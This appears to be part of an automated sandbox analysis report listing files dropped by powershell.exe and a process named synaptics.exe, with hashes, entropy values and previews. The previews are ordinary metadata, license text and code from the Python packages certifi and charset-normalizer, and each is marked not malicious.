                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):91
                                                                                                                                                                                                            Entropy (8bit):4.7098485981676825
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:RtEeXMRYFARLhmv6gP+tPCCfA5S:RtC1RLQvxWBBf
                                                                                                                                                                                                            MD5:EE89609DEB10E968E7B570677481118A
                                                                                                                                                                                                            SHA1:AD941D4E29A2C4CF8AB20D4C084CBE4CC0EBC2DE
                                                                                                                                                                                                            SHA-256:52F71060A047A05A9A41DE8B2B2A87C3D7F11289562D09E5CCFD21FCB80901F2
                                                                                                                                                                                                            SHA-512:5987C0D8057A1C718A3F705C44FBAC456CD074FBA3D4F6204DF2A209031A580B8EF6DD5F889EAEA1AE0959BD36ECFC16EE76C1E07BC191B72B68D58F7B191C97
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: setuptools (74.0.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8
                                                                                                                                                                                                            Entropy (8bit):2.75
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:HZ:HZ
                                                                                                                                                                                                            MD5:5EBD7F7C387EBB31C14E3C701023AC97
                                                                                                                                                                                                            SHA1:BC5EA804A025DFFDE14FBF3746E34487196073D7
                                                                                                                                                                                                            SHA-256:28CBB8BD409FB232EB90F6D235D81D7A44BEA552730402453BFFE723C345EBE5
                                                                                                                                                                                                            SHA-512:7F2312A62A532E761DC45D0FF45FFE3FA599360AC0399D59EC8A39045C9E8CB62C912FC6C6F3A1C45ADBCAA10DDE77A8493567BB478839819C15F5FDD7E5C889
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:certifi.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):243
                                                                                                                                                                                                            Entropy (8bit):4.451797874382859
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:JW6yXBbjB2V+WuSZFeewrCy00y+0re6r/hu:JWfQYWuSZWFdQhu
                                                                                                                                                                                                            MD5:269E7F0CA2FA570B10E690595E6AEDAB
                                                                                                                                                                                                            SHA1:F09C4BA5E7EE37DDEBE914DEF9D97152CB5EB856
                                                                                                                                                                                                            SHA-256:C410688FDD394D45812D118034E71FEE88BA7BEDDD30FE1C1281BD3B232CD758
                                                                                                                                                                                                            SHA-512:01CA6DF3FB218B374BBA6653F5E72D6D6A9B07BB22215D5D96D2155DF037A9C6ED8D4F0FF8C789231A6C8C2555229700056FF6F740516F42F839E057FFF59F70
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import argparse..from certifi import contents, where..parser = argparse.ArgumentParser().parser.add_argument("-c", "--contents", action="store_true").args = parser.parse_args()..if args.contents:. print(contents()).else:. print(where()).
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):258
                                                                                                                                                                                                            Entropy (8bit):4.940659070559268
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/DX70tVlGNlBbAlZpvklBPG/Xg50aLw/Ck/AXzLV7IQPtqDNtolGXgrAnZiVWrp:y/DYeNbsZvEG/Xg6nCbWjN2olUArsq4G
                                                                                                                                                                                                            MD5:7D5A4B07D1EE9464CB6A1A7B550E1983
                                                                                                                                                                                                            SHA1:AE4EFDE8B134E4680FD5227B01BF0781F6931F07
                                                                                                                                                                                                            SHA-256:84C6339BA4880CD55BFEC03E873E40FC379BC3EAB4119C0A1585696FC004C2CF
                                                                                                                                                                                                            SHA-512:FD49960E3FD67895A94B5CCBBE2C657B13E491A114A746F6BA2F9FA4962A6A15E272133C92797A6D15A96F6ADBE9DD97938434C9369256B28E39595F74B2FBAD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g^........................@...s ...d.d.l.m.Z.m.Z...d.d.g.Z.d.Z.d.S.)......)...contents..wherer....r....z.2024.08.30N)...corer....r......__all__..__version__..r....r.....4C:\WinExplorer\lib\site-packages\certifi\__init__.py..<module>....s..........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):283
                                                                                                                                                                                                            Entropy (8bit):5.1545025652500955
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/Y0eNbsZvEG/Xg6nCbWjN2oKuwkn23h/a/Arsq4G:CJeNQeGVN2oKpfsHq7
                                                                                                                                                                                                            MD5:5003B13C902269C0ECDDC0EFE200E642
                                                                                                                                                                                                            SHA1:4B27918F8EA3E2912279C006E0C7429FAE0A3EED
                                                                                                                                                                                                            SHA-256:0117F6D597E55710B9772DD55DF956E3FCEB606E08F4AFA7D6EFD866AFC910F5
                                                                                                                                                                                                            SHA-512:E330CB3DA11AA0865F698B3E7BBF9E34286F9462F4FDD7D58F434965E5A104A8E25BB62DA7CE0424B737CE8D5962126812650A346026DDFE851EC9F2C1E86CDD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g^........................@...s ...d.d.l.m.Z.m.Z...d.d.g.Z.d.Z.d.S.)......)...contents..wherer....r....z.2024.08.30N)...corer....r......__all__..__version__..r....r.....MC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\certifi\__init__.py..<module>....s..........
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):447
                                                                                                                                                                                                            Entropy (8bit):5.2352890230578835
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:C7tC5XQSF5DJrsc3YWaaBM2/gV+ys3/2IO3uhumz:O835DJ4RC62YLO2F39W
                                                                                                                                                                                                            MD5:1BF5915FC71074271AEC0972A165127C
                                                                                                                                                                                                            SHA1:5B2B4FA78CF5DF6A667300AF14805F71841BB151
                                                                                                                                                                                                            SHA-256:6BDE71928BAC5C9CAE6F9D4C3FEE49A8BE30338DE29C59BE48BD92FF0F698EFE
                                                                                                                                                                                                            SHA-512:8D6CF28B4A115E8284C135B8BFF3A29B7A658DC0FDEBA753DE65320004327BFE3F76014A04EBA88339EEC3278E852B89B87EFD01EFB6E85CAAF8AA3BC4C4A841
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sZ...d.d.l.Z.d.d.l.m.Z.m.Z...e.....Z.e.j.d.d.d.d.....e.....Z.e.j.r&e.e.......d.S.e.e.......d.S.)......N)...contents..wherez.-cz.--contents..store_true)...action)...argparse..certifir....r......ArgumentParser..parser..add_argument..parse_args..args..print..r....r.....gC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\certifi/__main__.py..<module>....s....................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2089
                                                                                                                                                                                                            Entropy (8bit):4.909264753331614
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:0yBUoxmgDZLaAAl/g95K3Q8+epPUHq7J8nH:7UC/vcg955epA1H
                                                                                                                                                                                                            MD5:878BDAD9D29F1CB668720243F82058AF
                                                                                                                                                                                                            SHA1:F610CA807A086DF36E316E93B08C130B042FB92E
                                                                                                                                                                                                            SHA-256:2BDF711F80A0B4C98247652E8E6247A22F8D6C7851E3A415A5448E47A525510B
                                                                                                                                                                                                            SHA-512:249B08C8BF892FCDBF202E824CDB5E5FB57F747C5B7904A045EA390D8815AC7B546DEB93089448A8E16E64A5D5B74D72D4001360D96B165E84E76A2090ED2963
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gJ........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.d...Z.e.j.d.k.r0d.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.e.j.d.k.rQd.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.j.e.f...Z.e.e.d.f...Z.....d.d.e.d.e.d.e.d.e.d.e.f.d.d...Z.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.).ze.certifi.py.~~~~~~~~~~..This module returns the installation location of cacert.pem or its contents.......N..returnc....................C...s....t...d.d.d.....d.S.).N)..._CACERT_CTX..__exit__..r....r.....0C:\WinExplorer\lib\site-packages\certifi\core.py..exit_cacert_ctx....s......r....)...........)...as_file..filesc....................C...s4...t.d.u.r.t.t.d.....d.....a.t.t.......a.t...t.....t.S...N..certifi..cacert.pem)..._CACERT_PATHr....r......joinpathr......str..__enter__..atexit..registerr....r....r....r....r......where....s..............r....c....................C...s....t.d.....d...j.d.d...S...Nr....r......ascii....encoding).r....r......read_textr....r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2114
                                                                                                                                                                                                            Entropy (8bit):4.954236366948841
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:8BUoxmgDZLakqAl/g95K3Q8+epPUHq7J8nH:QUC/ocg955epA1H
                                                                                                                                                                                                            MD5:E73ADF472F6F144514B9054EFA052C48
                                                                                                                                                                                                            SHA1:9C8D3894B3D8F8BFB676D1F27360EA6CA7EB3774
                                                                                                                                                                                                            SHA-256:6D858B06DA57AAFD411F215F6988AC5AA709ABE39AD8DC53A1DAC234F4837B91
                                                                                                                                                                                                            SHA-512:01E1439C91B73DFA8112E0E8924AB8FE2CD2B6CDFCE6833005B97DCFAC47CA2D747911E7EC21C8154D7BF307FA7C23EFF6100F3290F8D6E8E5B858D07754F43F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gJ........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.d...Z.e.j.d.k.r0d.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.e.j.d.k.rQd.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.j.e.f...Z.e.e.d.f...Z.....d.d.e.d.e.d.e.d.e.d.e.f.d.d...Z.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.).ze.certifi.py.~~~~~~~~~~..This module returns the installation location of cacert.pem or its contents.......N..returnc....................C...s....t...d.d.d.....d.S.).N)..._CACERT_CTX..__exit__..r....r.....IC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\certifi\core.py..exit_cacert_ctx....s......r....)...........)...as_file..filesc....................C...s4...t.d.u.r.t.t.d.....d.....a.t.t.......a.t...t.....t.S...N..certifi..cacert.pem)..._CACERT_PATHr....r......joinpathr......str..__enter__..atexit..registerr....r....r....r....r......where....s..............r....c....................C...s....t.d.....d...j.d.d...S...Nr....r......ascii....encoding).r.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1090
                                                                                                                                                                                                            Entropy (8bit):5.134195133084166
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:79rzJHkH0yw3gt3DQJq1hBE9QHbsUv4fOk4/+8/3oqaFQ:79HJMlUE/BGQHbs5JK/3oDFQ
                                                                                                                                                                                                            MD5:CD9C0DDB0134B2605B0A42BADAECA09D
                                                                                                                                                                                                            SHA1:E7B35A2C9FB8F9AB4117B3272F85E8F37F254097
                                                                                                                                                                                                            SHA-256:CE79E3D556ABFE567E8733AF0F95B9D307100E9F6A96CDD20F6C486AEF3CB9F7
                                                                                                                                                                                                            SHA-512:EDB1734E6ADCAD23CF847FCE6D56FB5C3C9FBB141568E9466CBC044BF5FA713D696690F81383611718F91B2784A12E847F8BCF368DEC004FCED7BAF965D020FE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MIT License....Copyright (c) 2019 TAHRI Ahmed R.....Permission is hereby granted, free of charge, to any person obtaining a copy..of this software and associated documentation files (the "Software"), to deal..in the Software without restriction, including without limitation the rights..to use, copy, modify, merge, publish, distribute, sublicense, and/or sell..copies of the Software, and to permit persons to whom the Software is..furnished to do so, subject to the following conditions:....The above copyright notice and this permission notice shall be included in all..copies or substantial portions of the Software.....THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR..IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,..FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE..AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER..LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):34854
                                                                                                                                                                                                            Entropy (8bit):5.075761286102409
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:blqVcS4r7SNydEabEp0b0Zq1RDpTwtRITbWjNWDlZN+P/GxD6gA:5Ccdr7SNyOa4p0wZq1RFTwtRITSwNv9A
                                                                                                                                                                                                            MD5:8119BD5730A297A38B3BC454C0F5B323
                                                                                                                                                                                                            SHA1:F42E52AF9BA0FF4A936BEA40169EE850C9A35181
                                                                                                                                                                                                            SHA-256:D904B80B80E14D552F33A0FBC5B91B617A2ABDC30E075A42DD5859C0B2D32B95
                                                                                                                                                                                                            SHA-512:A5C6DB37F6ED7367B4556C8E219DEA3B179F4430DDF462D257E45C79905AE5736CA891BCF5C3FF256AF8C9652B90CE1F253BB1F5566C0B97564D211FB7F1B2CA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:Metadata-Version: 2.1..Name: charset-normalizer..Version: 3.4.0..Summary: The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet...Home-page: https://github.com/Ousret/charset_normalizer..Author: Ahmed TAHRI..Author-email: tahri.ahmed@proton.me..License: MIT..Project-URL: Bug Reports, https://github.com/Ousret/charset_normalizer/issues..Project-URL: Documentation, https://charset-normalizer.readthedocs.io/en/latest..Keywords: encoding,charset,charset-detector,detector,normalization,unicode,chardet,detect..Classifier: Development Status :: 5 - Production/Stable..Classifier: License :: OSI Approved :: MIT License..Classifier: Intended Audience :: Developers..Classifier: Topic :: Software Development :: Libraries :: Python Modules..Classifier: Operating System :: OS Independent..Classifier: Programming Language :: Python..Classifier: Programming Language :: Python :: 3..Classifier: Programming Language :: Python :: 3.7..Classifier: Programmi
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2753
                                                                                                                                                                                                            Entropy (8bit):5.7137134323731145
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:setvUgxnuXwxKTT/xpxvtxlwRxLjH8xlFZCieYCpPOCqtC3tCGtCFtCwtCBtCTtH:setvUgUXw27HP4N8VZlpOGt8Dm3yE3JJ
                                                                                                                                                                                                            MD5:D18C19CE804D9099DAF6C7521F058F64
                                                                                                                                                                                                            SHA1:A0A6B02A3EA06C1E316EFB3B0E622C844CF1A913
                                                                                                                                                                                                            SHA-256:411A836C9C943912FF1E4F4CE9C3067FBADC1691F50E48E8E0809A9538083F86
                                                                                                                                                                                                            SHA-512:A471D472B8B15BA9E2023B9ADDA516B5A5228E098E7407D3E0F4CD0098C7C770734AB872EF415C2A2CFEAE19E9910B8BFADC1032D619D0E517C6927AC3E6BA43
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:../../Scripts/normalizer.exe,sha256=B7C_AB9kHGlogJWoQOxotc2tf11KhVQCQxNJNreSNh0,98207..charset_normalizer-3.4.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..charset_normalizer-3.4.0.dist-info/LICENSE,sha256=znnj1Var_lZ-hzOvD5W50wcQDp9qls3SD2xIau88ufc,1090..charset_normalizer-3.4.0.dist-info/METADATA,sha256=2QS4C4DhTVUvM6D7xbkbYXoqvcMOB1pC3VhZwLLTK5U,34854..charset_normalizer-3.4.0.dist-info/RECORD,,..charset_normalizer-3.4.0.dist-info/WHEEL,sha256=vWOmsWnO0Nob147kL-aXKbtep3IWyBtFMRAV1wTXzXg,97..charset_normalizer-3.4.0.dist-info/entry_points.txt,sha256=ADSTKrkXZ3hhdOVFi6DcUEHQRS0xfxDIE_pEz4wLIXA,65..charset_normalizer-3.4.0.dist-info/top_level.txt,sha256=7ASyzePr8_xuZWJsnqJjIBtyV8vhEo0wBCv1MPRRi3Q,19..charset_normalizer/__init__.py,sha256=m1cUEsb9K5v831m9P_lv2JlUEKD7MhxL7fxw3hn75o4,1623..charset_normalizer/__main__.py,sha256=nVnMo31hTPN2Yy045GJIvHj3dKDJz4dAQR3cUSdvYyc,77..charset_normalizer/__pycache__/__init__.cpython-310.pyc,,..charset_normalizer/__pycach
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):97
                                                                                                                                                                                                            Entropy (8bit):4.8836482863618205
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:RtEeXMRYFAQ6AP+tkKcwVTiSMLWnn:RtC1dAWKGFiSMLE
                                                                                                                                                                                                            MD5:A6B367429F58C9E51971AAF04D085E2E
                                                                                                                                                                                                            SHA1:3B2A30510751E04BE8353572265CF353B5A8B2D1
                                                                                                                                                                                                            SHA-256:BD63A6B169CED0DA1BD78EE42FE69729BB5EA77216C81B45311015D704D7CD78
                                                                                                                                                                                                            SHA-512:BD3D1C16CED32A780B892EFFDD9353C2B1E7244CF72892EE24A9505CF97740A9AFC82C853BED54BF1220F53CBDE335EA8EB5C94133251F06EC8EC04114596CE6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: setuptools (75.1.0).Root-Is-Purelib: false.Tag: cp310-cp310-win32..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65
                                                                                                                                                                                                            Entropy (8bit):4.237548298130841
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:1LKpjqB6GDSFARA4:1LK2B6GeFA/
                                                                                                                                                                                                            MD5:946B4FCD3FCFACE4499FBDD19855FFAF
                                                                                                                                                                                                            SHA1:EB389BBB99774531F490BA09DE2D6FE307718512
                                                                                                                                                                                                            SHA-256:0034932AB91767786174E5458BA0DC5041D0452D317F10C813FA44CF8C0B2170
                                                                                                                                                                                                            SHA-512:EBCAA49820A7B53093C3ECA412D27A102CACDE04D2ECDDFB875A821330289E32B6590A033BCD0315330B9890F965972D7AD833D625452466E9C02D80C46B9B5F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:[console_scripts].normalizer = charset_normalizer.cli:cli_detect.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):19
                                                                                                                                                                                                            Entropy (8bit):3.7871439606981414
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:O06Gnn:O06Gn
                                                                                                                                                                                                            MD5:2272ED22C63EBEE3F83CD23E68EE7407
                                                                                                                                                                                                            SHA1:DAE3EBDCC69B477D630CD238AD44582110512F1F
                                                                                                                                                                                                            SHA-256:EC04B2CDE3EBF3FC6E65626C9EA263201B7257CBE1128D30042BF530F4518B74
                                                                                                                                                                                                            SHA-512:651D9B93A48D6AAF7328E35D1C5BBA84247BCA04F6899099059C662DBE72F3EBA35CB9CBD5F27DCAAE3AE5A089E502066E4C8FE1FA11379F589BF9D678DB53CD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:charset_normalizer.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1623
                                                                                                                                                                                                            Entropy (8bit):5.323138942576867
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:puqAQwyptdi1RLhwwl1/DfV8Vgja5HlN8aB:puqAQw9q21/DfV8Sa2aB
                                                                                                                                                                                                            MD5:A99E49E46791D457E956314E73C8BCD2
                                                                                                                                                                                                            SHA1:8EFCCB21F10F9CCAAC0FF8D5A09DC0BBD260535A
                                                                                                                                                                                                            SHA-256:9B571412C6FD2B9BFCDF59BD3FF96FD8995410A0FB321C4BEDFC70DE19FBE68E
                                                                                                                                                                                                            SHA-512:EDE2F24B335C2D43C9DF86B865A06E932B884EAD68747F79893F6C00D99DB9A97BD1C9B7A529183278BE0CA78E8E3A798A221C35FCF92335F671510CA993412B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-.."""..Charset-Normalizer..~~~~~~~~~~~~~~..The Real First Universal Charset Detector...A library that helps you read text from an unknown charset encoding...Motivated by chardet, This package is trying to resolve the issue by taking a new approach...All IANA character set names for which the Python core library provides codecs are supported.....Basic usage:.. >>> from charset_normalizer import from_bytes.. >>> results = from_bytes('B.... ..... ... ..... .. ............ O............!'.encode('utf_8')).. >>> best_guess = results.best().. >>> str(best_guess).. 'B.... ..... ... ..... .. ............ O............!'....Others methods and usages are available - see the full documentation..at <https://github.com/Ousret/charset_normalizer>...:copyright: (c) 2021 by Ahmed TAHRI..:license: MIT, see LICENSE for more details..."""..import logging....from .api import from_bytes, fro
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):77
                                                                                                                                                                                                            Entropy (8bit):4.168966465012458
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:1LGGMHRYF0AnrjhAjpv/Fhq0AHy:1LCxgNFAjpH7q0
                                                                                                                                                                                                            MD5:A7BB1AAA21433C358CD1B40294C6627E
                                                                                                                                                                                                            SHA1:8C1F3F49FCABE5D1F2AFD9B607D5F8B1C0CAE96D
                                                                                                                                                                                                            SHA-256:9D59CCA37D614CF376632D38E46248BC78F774A0C9CF8740411DDC51276F6327
                                                                                                                                                                                                            SHA-512:D7324A84DCC20C30F722E481DC1D84D322A8CE84DD4CF0798F4ABEACA1DBBB6872C626521AF877D19798351B6A1900F1EEAC71FEEB0F83A3E21EE9AA056124D1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from .cli import cli_detect....if __name__ == "__main__":.. cli_detect()..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1554
                                                                                                                                                                                                            Entropy (8bit):5.688562027309206
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:0S4jbqjQtyat/c2vhCMhju/C/yv+KDeUy:ZWbqjQttwZ/C/yvvDeUy
                                                                                                                                                                                                            MD5:E17E549E4378E25758D5A5D4337EBF43
                                                                                                                                                                                                            SHA1:B9136CD8991994104479A134AF2E261FEB846E27
                                                                                                                                                                                                            SHA-256:D1BD3808379A993878BE62557C257D2EA4D58B798FB2E496CDB970E7B4B3BA99
                                                                                                                                                                                                            SHA-512:1B58478BA884E69E9DAEDEB2EA37B16766FF46E4D87D19A3CD5E7F8945C2C27DC12147276CA6DB9E83505A86E2F996BA2A631EAFDD734ED5A89BE13C9A0E668E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gW........................@...sx...d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.e...d.....e.........d.S.).u.....Charset-Normalizer.~~~~~~~~~~~~~~.The Real First Universal Charset Detector..A library that helps you read text from an unknown charset encoding..Motivated by chardet, This package is trying to resolve the issue by taking a new approach..All IANA character set names for which the Python core library provides codecs are supported...Basic usage:. >>> from charset_normalizer import from_bytes. >>> results = from_bytes('B.... ..... ... ..... .. ............ O............!'.encode('utf_8')). >>> best_guess = results.best(). >>> str(best_guess). 'B.... ..... ... ..... .. ............ O............!'..Others methods and usages are available - see the full documentation.at <https://github.com/Ousret/charset_normalizer>..:copyright
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1579
                                                                                                                                                                                                            Entropy (8bit):5.723146470400134
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:04jbqjQtyat/c2vhCMhju/C/yv+K7qeUy:0WbqjQttwZ/C/yvvWeUy
                                                                                                                                                                                                            MD5:ADE62DABE3C84066BE5802D0BF7E0B24
                                                                                                                                                                                                            SHA1:C436F12D8879D9AE6DA3F4D31DD672267D35005B
                                                                                                                                                                                                            SHA-256:388B4976950E9EA84581CE83CB16DEDE552773FD8ABB39E1F55F5F17B6374211
                                                                                                                                                                                                            SHA-512:C726CF4F31A3F1417ACA87A535513F3C27049595B29167CE2758EDDCC2A8EEE584004F6C9D28159E0C8FFB816679A716CCE1EF577D6C47892F72DC308EE76C71
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
